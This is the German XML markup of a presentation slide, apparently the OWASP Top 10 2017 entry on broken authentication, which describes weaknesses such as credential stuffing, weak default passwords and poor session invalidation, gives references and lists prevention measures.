              <a:t> Die automatische Abmeldung bei Inaktivität ist nicht korrekt implementiert. Ein Nutzer verwendet einen öffentlichen Computer, um auf die Anwendung zuzugreifen. Anstatt die Abmeldefunktion zu nutzen, schließt der Benutzer lediglich den </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Browsertab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. Eine Stunde später nutzt ein Angreifer denselben Browser und stellt fest, dass der Nutzer immer noch angemeldet ist.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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Ist die Anwendung verwundbar?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Um eine Anwendung gegen Angriffe auf die Authentisierung zu schützen, müssen die Nutzeridentität, Anmeldung und die Sitzungsverwaltung überprüft werden.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Folgende Fehler in der Authentisierung können vorhanden sein:</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="900" dirty="0">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de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Automatisierte Angriffe wie “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Credential</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Stuffing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>” werden ermöglicht. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bruteforce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> oder andere automatisierte Angriffe sind möglich.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Schwache oder bekannte Passwörter wie “Passwort!” oder “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>” sind erlaubt, Standardpasswörter unverändert.. </a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Funktionen um Zugangsdaten oder Passwörter wiederherzu-stellen sind schwach, wie z. B. „wissensbasierte Antworten“, die nicht sicher sein können. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Speicherung von Passwörtern im Klartext, verschlüsselt oder mit schwachen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (vgl. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A3:2017-Verlust der Vertraulichkeit sensibler Daten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="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charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Keine oder nicht wirksame Mehrfaktor-Authentisierung</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Die Sitzungs-ID wird im URL exponiert (z. B. URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rewriting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="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charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Kein Wechsel der Sitzungs-ID nach einer erfolgreichen Anmeldung.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sitzungs-IDs werden nicht korrekt ungültig gemacht, d.h. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Be-nutzersitzungen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> oder Authentisierungs-Token (wie z.B. Single-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-On (SSO)-Token) werden nach einer Abmeldung, nach einer festen Zeit oder bei Nicht-Aktivität nicht explizit ungültig gemacht.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="10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Referenzen</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Proactive Controls: Implement Identity and Authentication Controls</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ASVS: V2 Authentication, V3 Session Management</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OWASP Testing Guide: Identity</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0"/>
              </a:rPr>
              <a:t>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1"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: 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OWASP Cheat Sheet: Credential Stuffing</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Cheat Sheet: Forgot Password</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OWASP Cheat Sheet: Session Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:hlinkClick r:id="rId14"/>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Automated Threats Handbook</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:hlinkClick r:id="rId14"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Andere</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId16"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>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7"/>
              </a:rPr>
              <a:t>NIST 800-63b: 5.1.1 Memorized Secrets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="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8"/>
              </a:rPr>
              <a:t>CWE-287: Improper Authentication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9"/>
              </a:rPr>
              <a:t>CWE-384: Session Fixation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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Wie kann ich das verhindern?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sofern es möglich ist, implementieren Sie Mehrfaktor-Authentisierung, um automatisierte Angriffe zu verhindern.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Im Auslieferungszustand sollten keine Standardbenutzer angelegt sein. Dies gilt besonders für administrative Benutzer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Es sollten Prüfungen zum Verhindern schwacher Passwörter implementiert sein. So können Passwörtern gegen eine Liste </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>der 10000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>beliebtesten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>Passwörter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>geprüft werden.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Die Prüfung der Länge, Komplexität und Häufigkeit des Pass-wortwechsels sollte sich an den Vorgaben der </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>NIST 800-63</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> o. anderen Vorgaben mit nachweisbarer Sicherheit orientieren.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Funktionen zur Benutzerregistrierung, Wiederherstellung von Zugangsdaten und API Zugängen sollten gegen das automatische Durchsuchen nach gültigen Benutzernamen geschützt sein, in dem bei allen fehlerhaften Anmelde-versuchen dieselbe Fehlermeldung ausgegeben wird.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Begrenzen Sie die Gesamtanzahl der Anmeldeversuche oder setzen Sie Verzögerungen ein. Fehlerhafte Anmeldungen müssen protokolliert und Administratoren informiert werden, wenn Anomalien oder Angriffe erkannt werden.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Es sollten serverseitige, sichere und etablierte Sitzungsmanager verwendet werden, die eine zufällig vergebene Sitzungs-ID mit hoher Entropie verwenden. Sitzungs-IDs sollten nicht in der URL stehen, sicher gespeichert und nach Abmeldung, Inaktivität oder einer gewissen Zeitenspanne entwertet werden.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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A2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Fehler in der Authentifizierung</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34"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3918882061"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="939600"/>
          <a:ext cx="6836400" cy="22441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100" b="1">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900" b="1" err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Ausnutzbarkeit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="500" b="1">
                          <a:solidFill>
